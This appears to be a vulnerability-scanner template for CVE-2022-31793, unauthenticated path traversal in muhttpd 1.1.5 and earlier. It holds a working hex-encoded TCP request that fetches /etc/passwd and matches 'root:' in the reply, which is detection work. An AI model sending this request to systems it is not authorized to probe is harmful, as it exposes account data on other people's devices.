Description
muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
id: CVE-2022-31793
info:
name: muhttpd <=1.1.5 - Local Inclusion
author: scent2d
severity: high
description: |
muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the system.
remediation: Update the application to version 1.10
reference:
- https://derekabdine.com/blog/2022-arris-advisory.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
- https://derekabdine.com/blog/2022-arris-advisory
- https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/
- http://inglorion.net/software/muhttpd/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31793
cwe-id: CWE-22
epss-score: 0.93819
epss-percentile: 0.99854
cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: inglorion
product: muhttpd
tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp,vkev,vuln
tcp:
- host:
- "{{Hostname}}"
inputs:
- data: "47455420612F6574632F706173737764"
type: hex
- data: "\n\n"
read-size: 128
matchers:
- type: word
part: body
encoding: hex
words:
- "726f6f743a"
# digest: 4a0a00473045022007419c8d3f1c804f8c840d27f573d5df718566dcb8c0686ca72202b75da0d72c022100bcf46da03b19993b4a04d00597833ee63c577330a83382baec20d70094a962d0:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.